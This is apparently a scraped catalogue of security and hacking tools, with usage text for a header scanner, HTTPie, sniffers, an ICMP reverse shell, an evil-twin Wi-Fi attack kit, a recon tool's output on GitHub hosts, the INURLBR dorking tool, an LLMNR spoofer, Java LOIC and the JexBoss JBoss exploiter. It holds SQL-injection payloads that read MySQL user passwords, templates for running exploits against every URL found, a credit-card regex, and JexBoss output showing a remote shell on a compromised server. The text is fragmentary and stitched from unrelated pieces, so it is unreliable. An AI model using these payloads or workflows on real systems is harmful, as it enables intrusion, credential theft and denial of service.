Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie: NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
Alt-Svc: quic="www.google.com:443"; p="1"; ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
>> RESPONSE HEADERS DETAILS <<
oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security
pitfalls. In particular, cookies encourage developers to
rely on ambient authority for authentication, often
becoming vulnerable to attacks such as cross-site request
forgery. Also, when storing session identifiers in
cookies, developers often create session fixation
vulnerabilities. Transport-layer encryption, such as that
employed in HTTPS, is insufficient to prevent a network
attacker from obtaining or altering a victim's cookies
because the cookie protocol itself has various
vulnerabilities. In addition, by default, cookies do not
provide confidentiality or integrity from network
attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/rfc6265#section-8
Recommendations: Please at least read these references: https://tools.ietf.org/html/rfc6265#section-8 and https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without
'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html
Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/rfc7233#section-2.3
Security Description: Unconstrained multiple range
requests are susceptible to denial-of-service attacks
because the effort required to request many overlapping
ranges of the same data is tiny compared to the time,
memory, and bandwidth consumed by attempting to serve the
requested data in many parts.
Security Reference: https://tools.ietf.org/html/rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or
reject egregious range requests, such as requests for
more than two overlapping ranges or for many small ranges
in a single set, particularly when the ranges are
requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption
('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html
Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Security Description: Overly long and detailed Server
field values increase response latency and potentially
reveal internal implementation details that might make it
(slightly) easier for attackers to find and exploit known
security holes.
Security Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a
Server field containing needlessly fine-grained detail
and SHOULD limit the addition of subproducts by third
parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html
Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/rfc7234#section-5.2
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include
security mechanisms, it is intended to be used in
conjunction with security tools. Users' personal
information should always be protected with reasonable
security safeguards in keeping with the sensitivity of
the information.
Security Reference: http://www.w3.org/TR/P3P11/#principles_security
Recommendations:
CWE:
CWE URL:
Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not
always properly configure their origin server to provide
the correct Content-Type for a given representation, with
Download Hsecscan
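The kind of per-header analysis hsecscan prints above, as an added example that is not hsecscan's own code: a small auditor that parses a raw response-header block and reports the conditions the report ties to individual headers, that is a Set-Cookie sent over HTTPS without the Secure attribute (CWE-614, as in the report) or without HttpOnly, a Server value that exposes product and version detail (CWE-200, as in the report), and a missing X-Frame-Options header. The CWE-1004 and CWE-1021 identifiers for the last two checks, the version-detail regex, and the two sample responses are this example's own choices, not taken from the page.

```python
"""Response-header audit, in the spirit of hsecscan's RESPONSE HEADERS DETAILS report.

Added example, not hsecscan's code.  Sample responses below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    header: str
    issue: str
    cwe: str


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Map lower-cased header names to their values; repeats (Set-Cookie) keep order."""
    headers: Dict[str, List[str]] = {}
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("HTTP/"):
            continue  # skip blank lines and the status line
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a header line
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def cookie_attributes(set_cookie: str) -> set:
    """Lower-cased attribute names of a Set-Cookie value ('Path=/' -> 'path')."""
    parts = [p.strip() for p in set_cookie.split(";")[1:]]
    return {p.split("=", 1)[0].lower() for p in parts if p}


def audit(raw_headers: str, over_https: bool = True) -> List[Finding]:
    """Return the header weaknesses found, in header order."""
    headers = parse_headers(raw_headers)
    findings: List[Finding] = []

    for cookie in headers.get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        attrs = cookie_attributes(cookie)
        if over_https and "secure" not in attrs:
            findings.append(Finding("Set-Cookie", f"cookie {name} lacks the Secure attribute", "CWE-614"))
        if "httponly" not in attrs:
            findings.append(Finding("Set-Cookie", f"cookie {name} lacks the HttpOnly attribute", "CWE-1004"))

    for server in headers.get("server", []):
        # A version after the product token or a parenthesised platform is fine-grained detail
        if re.search(r"/\d|\(", server):
            findings.append(Finding("Server", f"value {server!r} reveals version/platform detail", "CWE-200"))

    if "x-frame-options" not in headers:
        findings.append(Finding("X-Frame-Options", "header missing; page may be framed", "CWE-1021"))

    return findings


# Constructed sample: one cookie without Secure, one without Secure and HttpOnly,
# a detailed Server banner and no anti-framing header.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Date: Sun, 08 Nov 2015 14:12:18 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly
Set-Cookie: PREF=1; Path=/
Content-Type: text/html; charset=UTF-8
Connection: close
"""

# Constructed sample with the same response hardened.
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Server: nginx
Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"== {label}: {len(audit(raw))} finding(s)")
        for f in audit(raw):
            print(f"  {f.header}: {f.issue} [{f.cwe}]")
```

The `over_https` flag matters for the Secure check: a cookie set on a plain-HTTP response cannot carry Secure meaningfully, so the auditor only raises CWE-614 when the response was served over TLS, which is the case the hsecscan report above is describing.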
HTTPIE - A CLI, CURL-LIKE TOOL FOR HUMANS
Installation
(If pip installation fails for some reason, you can try
easy_install httpie as a fallback.)
Development version
The latest development version can be installed directly from
GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD
# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master
Usage
Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output
options:
$ http -v example.org
The name of the HTTP method comes right before the URL
argument:
$ http DELETE example.org/todos/7
Download HTTPie
HTTPNETWORKSNIFFER V1.50 - PACKET SNIFFER TOOL
THAT CAPTURES ALL HTTP REQUESTS/RESPONSES
You can easily select one or more HTTP information lines, and
then export them to text/html/xml/csv file or copy them to the
clipboard and then paste them into Excel.
System Requirements
/load_file_pcap <Filename>
/load_file_netmon <Filename>
DownloadHTTPNetworkSniffer v1.50
HYPERFOX - HTTP AND HTTPS TRAFFIC INTERCEPTOR
DownloadHyperfox
I2P - THE INVISIBLE INTERNET PROJECT
Download I2P
ICMPSH - SIMPLE REVERSE ICMP SHELL
Usage
If you miss doing that, you will receive information from the
slave, but the slave is unlikely to receive commands sent from
the master.
Running the slave
The slave comes with a few command line options as outlined
below:
-t host
-o milliseconds
-b num
Downloadicmpsh
INFERNAL-TWIN - THIS IS EVIL TWIN ATTACK
AUTOMATED (WIRELESS HACKING)
How to install
$ sudo apt-get install apache2
$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root
FAQ:
I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be a few issues with database connectivity. The
solution is to create a new user on the database and use that
user for launching the tool. Follow these steps.
1. Delete dbconnect.conf file from the Infernalwireless folder
Release Notes:
New Features:
Implemented
WPA2 hacking
WEP Hacking
SSL Strip
Report generation
PDF Report
HTML Report
Network mapping
MiTM
Probe Request
Changes:
Improved compatibility
Report improvement
Bug Fixes:
Coming Soon:
More attacks.
Expected bugs:
Freeze
Download Infernal-Twin
INSTANT PDF PASSWORD PROTECTOR - PASSWORD
PROTECT PDF FILE
standard Encryption methods - RC4/AES (40-bit, 128-bit, 256-bit) based upon the desired security level.
In addition to this, it also helps you set advanced restrictions to
prevent Printing, Copying or Modification of target PDF file.
To further secure it, you can also set 'Owner Password' (also
called Permissions Password) to stop anyone from removing
these restrictions.
'PDF Password Protector' includes Installer for quick
installation/un-installation. It works on both 32-bit & 64-bit
platforms starting from Windows XP to Windows 8.
Features
Copying
Printing
Signing
Commenting
Document Assembly
Page Extraction
or
pip install pythonwhois ipwhois ipaddress shodan
Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
# ____________________ Scanning github.com ____________________ #
# DNS lookups
[*] Domain: github.com
[*] IPs & reverse DNS:
192.30.252.130 - github.com
[*] NS records:
ns4.p16.dynect.net
204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
208.78.70.16 - ns1.p16.dynect.net
[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
74.125.25.26 - pa-in-f26.1e100.net
# Whois lookups
[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date:
2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
asn_registry: arin
net 0:
cidr: 192.30.252.0/22
range: 192.30.252.0 - 192.30.255.255
name: GITHUB-NET4-1
description: GitHub, Inc.
handle: NET-192-30-252-0-1
address: 88 Colin P Kelly Jr Street
city: San Francisco
state: CA
postal_code: 94107
country: US
abuse_emails: abuse@github.com
tech_emails: hostmaster@github.com
created: 2012-11-15 00:00:00
updated: 2013-01-05 00:00:00
# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub
Port: 22
Banner: SSH-2.0-libssh-0.6.0
Key type: ssh-rsa
Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://192.30.252.130/
Connection: close
# Querying Google for subdomains and Linkedin pages, this
might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/
company/github
[*] Subdomains:
blueimp.github.com
199.27.75.133
bounty.github.com
199.27.75.133
designmodo.github.com
199.27.75.133
developer.github.com
199.27.75.133
digitaloxford.github.com
199.27.75.133
documentcloud.github.com
199.27.75.133
education.github.com
50.19.229.116 ec2-50-19-229-116.compute-1.amazonaws.com
50.17.253.231 ec2-50-17-253-231.compute-1.amazonaws.com
54.221.249.148 ec2-54-221-249-148.compute-1.amazonaws.com
enterprise.github.com
54.243.192.65 ec2-54-243-192-65.compute-1.amazonaws.com
54.243.49.169 ec2-54-243-49-169.compute-1.amazonaws.com
erkie.github.com
199.27.75.133
eternicode.github.com
199.27.75.133
facebook.github.com
199.27.75.133
fortawesome.github.com
199.27.75.133
gist.github.com
192.30.252.141 - gist.github.com
guides.github.com
199.27.75.133
h5bp.github.com
199.27.75.133
harvesthq.github.com
199.27.75.133
help.github.com
199.27.75.133
hexchat.github.com
199.27.75.133
hubot.github.com
199.27.75.133
ipython.github.com
199.27.75.133
janpaepke.github.com
199.27.75.133
jgilfelt.github.com
199.27.75.133
jobs.github.com
54.163.15.207 ec2-54-163-15-207.compute-1.amazonaws.com
kangax.github.com
199.27.75.133
karlseguin.github.com
199.27.75.133
kouphax.github.com
199.27.75.133
learnboost.github.com
199.27.75.133
liferay.github.com
199.27.75.133
lloyd.github.com
199.27.75.133
mac.github.com
199.27.75.133
mapbox.github.com
199.27.75.133
matplotlib.github.com
199.27.75.133
mbostock.github.com
199.27.75.133
mdo.github.com
199.27.75.133
mindmup.github.com
199.27.75.133
mrdoob.github.com
199.27.75.133
msysgit.github.com
199.27.75.133
nativescript.github.com
199.27.75.133
necolas.github.com
199.27.75.133
nodeca.github.com
199.27.75.133
onedrive.github.com
199.27.75.133
pages.github.com
199.27.75.133
panrafal.github.com
199.27.75.133
parquet.github.com
199.27.75.133
pnts.github.com
199.27.75.133
raw.github.com
199.27.75.133
rg3.github.com
199.27.75.133
rosedu.github.com
199.27.75.133
schacon.github.com
199.27.75.133
scottjehl.github.com
199.27.75.133
shop.github.com
192.30.252.129 - github.com
shopify.github.com
199.27.75.133
status.github.com
184.73.218.119 ec2-184-73-218-119.compute-1.amazonaws.com
107.20.225.214 ec2-107-20-225-214.compute-1.amazonaws.com
thoughtbot.github.com
199.27.75.133
tomchristie.github.com
199.27.75.133
training.github.com
199.27.75.133
try.github.com
199.27.75.133
twbs.github.com
199.27.75.133
twitter.github.com
199.27.75.133
visualstudio.github.com
54.192.134.13 server-54-192-134-13.syd1.r.cloudfront.net
54.230.135.112 server-54-230-135-112.syd1.r.cloudfront.net
54.192.134.21 server-54-192-134-21.syd1.r.cloudfront.net
54.230.134.194 server-54-230-134-194.syd1.r.cloudfront.net
54.192.133.169 server-54-192-133-169.syd1.r.cloudfront.net
54.192.133.193 server-54-192-133-193.syd1.r.cloudfront.net
54.230.134.145 server-54-230-134-145.syd1.r.cloudfront.net
54.240.176.208 server-54-240-176-208.syd1.r.cloudfront.net
wagerfield.github.com
199.27.75.133
webcomponents.github.com
199.27.75.133
webpack.github.com
199.27.75.133
weheart.github.com
199.27.75.133
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.153 - pages.github.com
192.30.252.154 - pages.github.com
192.30.252.155 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.157 - githubusercontent.github.com
192.30.252.158 - githubusercontent.github.com
192.30.252.159 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.252.193 - github-smtp2-ext2.iad.github.net
192.30.252.194 - github-smtp2-ext3.iad.github.net
192.30.252.195 - github-smtp2-ext4.iad.github.net
192.30.252.196 - github-smtp2-ext5.iad.github.net
192.30.252.197 - github-smtp2-ext6.iad.github.net
192.30.252.198 - github-smtp2-ext7.iad.github.net
192.30.252.199 - github-smtp2-ext8.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.3 - janky-nix102-cp1-prd.iad.github.com
192.30.253.4 - janky-nix103-cp1-prd.iad.github.com
192.30.253.5 - janky-nix104-cp1-prd.iad.github.com
192.30.253.6 - janky-nix105-cp1-prd.iad.github.com
192.30.253.7 - janky-nix106-cp1-prd.iad.github.com
192.30.253.8 - janky-nix107-cp1-prd.iad.github.com
192.30.253.9 - janky-nix108-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1prd.iad.github.com
192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done
Download InstaRecon
INTRIGUE - INTELLIGENCE GATHERING FRAMEWORK
Starting up...
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward DnsRecord#intrigue.io true
[+] Starting task
[+] Task complete!
[+] Start Results
DnsRecord#www.intrigue.io
IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option:
{:name=>"resolver", :type=>"String", :regex=>"ip_address"
, :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver",
"value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option:
{:name=>"brute_list", :type=>"String", :regex=>"alpha_num
eric_list", :default=>["mx", "mx1", "mx2", "www", "ww2",
"ns1", "ns2", "ns3", "test", "mail", "owa", "vpn",
"admin", "intranet", "gateway", "secure", "admin",
"service", "tools", "doc", "docs", "network", "help",
"en", "sharepoint", "portal", "public", "private", "pub",
"zeus", "mickey", "time", "web", "it", "my", "photos",
"safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list",
"value"=>"1,2,3,4,www"}
Check the Alexa top 1000 domains for the existence of security
headers:
$ for x in `cat data/domains.txt | head -n 1000`; do bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#$x; done
> x = Intrigue.new
# Create an entity hash with a :type key and an :attributes key
> entity = {
  :type => "String",
  :attributes => { :name => "intrigue.io" }
}
# Create a list of options (this can be empty)
> options_list = [
  { :name => "resolver", :value => "8.8.8.8" }
]
# Start the task; the return value is the task run id
> id = x.start "example", entity, options_list
> id
You can use the tried and true curl utility to request a task run.
Specify the task type, specify an entity, and the appropriate
options:
$ curl -s -X POST -H "Content-Type: application/json" \
  -d '{ "task": "example", "entity": { "type": "String", "attributes": { "name": "8.8.8.8" } }, "options": {} }' \
  http://127.0.0.1:7777/v1/task_runs
Download Intrigue-core
INURLBR - ADVANCED SEARCH IN MULTIPLE SEARCH
ENGINES
Help:
-h
--help
--ajuda
--info
Information script.
[1...24] / [e1..6]]:
[options]:
1
- BING
- YAHOO BR
- ASK
- HAO123 BR
- GOOGLE (API)
- LYCOS
- UOL BR
- YAHOO US
10 - SAPO
11 - DMOZ
12 - GIGABLAST
13 - NEVER
14 - BAIDU BR
15 - YANDEX
16 - ZOO
17 - HOTBOT
18 - ZHONGSOU
19 - HKSEARCH
20 - EZILION
21 - SOGOU
22 - DUCK DUCK GO
23 - BOOROW
24
--------------------------------------- SPECIAL MOTORS ---------------------------------------
e1 - TOR FIND
e2 - ELEPHANT
e3 - TORSEARCH
e4 - WIKILEAKS
e5 - OTN
e6 - EXPLOITS SHODAN
Example: -q {op}
Usage:
-q 1
-q 5
Using more than one engine:
-q
1,2,5,6,11,24
Using all engines:
-q all
--proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:12334@172.16.0.90:8080
--proxy-file Set a source file to randomize your proxy for
each search engine.
Example: --proxy-file {proxys}
Usage:
--proxy-file proxys_list.txt
--time-proxy 10
--proxy-http-file http_proxys.txt
the script:
It establishes connection with the exploit through
the get method.
Demo: www.alvo.com.br/pasta/index.php?id={exploit}
types:
Then, of course, it also establishes connection with
the exploit through the get method
Demo: www.target.com.br{exploit}
Default:
Example: -t {op}
Usage:
4
-t 1
www.target.com.br/brazil.php?new={exploit}
5
[*]ZEND FRAMEWORK,
[*]ERROR MYSQL,
[*]ERROR MICROSOFT,
[*]ERROR POSTGRESQL,
[*]CMS WORDPRESS,
[*]ERROR JDBC,
[*]ERROR ASP,
[*]ERROR ORACLE,
[*]CFM,
[*]SHELL WEB,
[*]ERROR DB2,
[*]JDBC
[*]ERROR LUA,
[*]ERROR INDEFINITE
--dork '[DORK]site:br[DORK]site:ar
inurl:php[DORK]site:il inurl:asp'
--dork-file Set a source file with your search dorks.
Example: --dork-file {dork_file}
Usage:
--dork-file 'dorks.txt'
--exploit-get "?'%270x27;"
--exploit-post
'field1=valor1&field2=valor2&field3=?
0x273exploit;&botao=ok'
--exploit-command '/admin/config.conf'
script:
Example: -a {string}
Usage:
-d
-a '<title>hello world</title>'
-s
vulnerable URLs.
Example: -s {file}
Usage:
-o
-s your_file.txt
-o tests.txt
Attempts when Google blocks your search.
--persist 7
Return validation method post REDIRECT_URL
--ifredirect '/admin/painel.php'
-m
-u
specified.
--gc Enable validation of values with google webcache.
--pr
--range '172.16.0.5#172.16.0.255'
--range-rand '50'
--irc 'irc.rizon.net#inurlbrasil'
--sedmail youemail@inurl.com.br
--delay 10
--time-out 10
--ifurl index.php?id=
--ifcode 200
--ifemail sp.gov.br
--url-reference http://target.com/admin/
user/valid.php
--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage:
--mp 50
--sall your_file.txt
_TARGET_'
--command-vul './exploit.sh _TARGET_
output.txt'
--command-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--command-all Use this command to specify a single
command to EVERY URL found.
Example: --command-all {command}
Usage:
_TARGET_'
--command-all './exploit.sh _TARGET_
output.txt'
--command-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
[!] Observation:
_TARGET_ will be replaced by the URL/target found,
although if the user
doesn't input the get, only the domain will be
executed.
_TARGETFULL_ will be replaced by the original URL /
target found.
argument --exploit-command.
The exploit-command will be identified by the
parameters --command-vul/ --command-all as _EXPLOIT_
--replace Replace values in the target URL.
Example:
Usage:
--replace {value_old[INURL]value_new}
--replace 'index.php?id=[INURL]index.php?
id=1666+and+(SELECT+user,Password+from+mysql.user+limit
+0,1)=1'
--replace 'main.php?id=[INURL]main.php?
id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?
id=1%27'
--remove Remove values in the target URL.
Example: --remove {string}
Usage:
--remove '/admin.php?id=0'
--regexp {regular_expression}
--regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5]
[0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|
3[47][0-9]{13})'
IP Addresses:
Usage:
--regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?
[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?))'
EMAIL:
Usage:
--regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
---regexp-filter {regular_expression}
EMAIL:
Usage:
---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.
\_\-]+)'
--exploit-all-id 1,2,8,22
--exploit-vul-id 1,2,8,22
--sub-file
--sub-file exploits_get.txt
--sub-get
--sub-get
_TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_
output.txt'
--sub-cmd-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--sub-cmd-all Run command to each target found within
the sub-process scope.
Example: --sub-cmd-all {command}
Usage:
_TARGET_'
--sub-cmd-all './exploit.sh _TARGET_
output.txt'
--sub-cmd-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
--port-scan '22,21,23,3306'
sqli=1'
--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage:
md5(102030)
Usage:
--exploit-get 'user?id=md5(102030)'
base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
hex(102030)
Usage:
--exploit-get 'user?id=hex(102030)'
random(8)
Usage:
--exploit-get 'user?id=random(8)'
Usage
To get a list of basic options and switches use:
php inurlbr.php -h
DownloadINURLBR
INVEIGH - A WINDOWS POWERSHELL LLMNR/NBNS
dedicated listener.
5. The local LLMNR/NBNS services do not need to be
disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's
SMB service, keep account lockout scenarios in mind.
7. Kerberos should downgrade for SMB authentication due
to spoofed hostnames not being valid in DNS.
8. Ensure that the LLMNR, NBNS, SMB and HTTP ports are open
within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from
output window for password cracking, remove carriage
returns.
Usage
DownloadInveigh
IP THIEF - SIMPLE IP STEALER IN PHP
Download IP Thief
IVRE - A PYTHON NETWORK RECON FRAMEWORK,
BASED ON NMAP, BRO & P0F
Passive recon
The following steps will show some examples of passive
network recon with IVRE. If you only want active (for example,
You need to run bro (2.3 minimum) with the option -b and the
location of the passiverecon.bro file. If you want to run it on
the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -i eth0
This will produce log files in the logs directory. You need to run
a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it; it will
stop gently (as soon as it has finished processing the current
file).
Using p0f
Active recon
Scanning
This will run a standard scan against 1000 random hosts on the
Internet by running 30 nmap processes in parallel. See the
output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/ROUTABLE/up
DownloadIVRE
JADX - JAVA SOURCE CODE FROM ANDROID DEX AND
APK FILES
Command line and GUI tools for producing Java source code
from Android Dex and Apk files.
Usage
jadx[-gui] [options] <input file> (.dex, .apk, .jar
or .class)
options:
-d, --output-dir    - output directory
dot file
--raw-cfg
- verbose output
-h, --help
Example:
jadx -d out classes.dex
Download JADX
JAVA LOIC - LOW ORBIT ION CANNON. A JAVA BASED
NETWORK STRESS TESTING APPLICATION
DownloadJava LOIC
JEXBOSS - JBOSS VERIFY AND EXPLOITATION TOOL
JexBoss is a tool for testing and exploiting vulnerabilities in
JBoss Application Server.
REQUIREMENTS
INSTALLATION
To install the latest version of JexBoss, please use the
following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py
FEATURES
The tool and exploits were developed and tested for versions 3,
4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss version 4
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4 and 5
USAGE EXAMPLE
--- *
|
| @author:
| @contact: joaomatosf@gmail.com
| @update: https://github.com/joaomatosf/jexboss
#______________________________________________________#
[ OK ]
* Checking jmx-console:
[ VULNERABLE ]
* Checking JMXInvokerServlet:
[ VULNERABLE ]
wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9
21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss)
context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
[Type commands or "exit" to finish]
Shell> hostname
fwgw
[Type commands or "exit" to finish]
Shell> ls -all /tmp
total 35436
drwxrwxrwt.
4 root root
snortrules-snapshot-2962.tar.gz
-rw-r--r--.
1 root root
32 Out 16 14:51
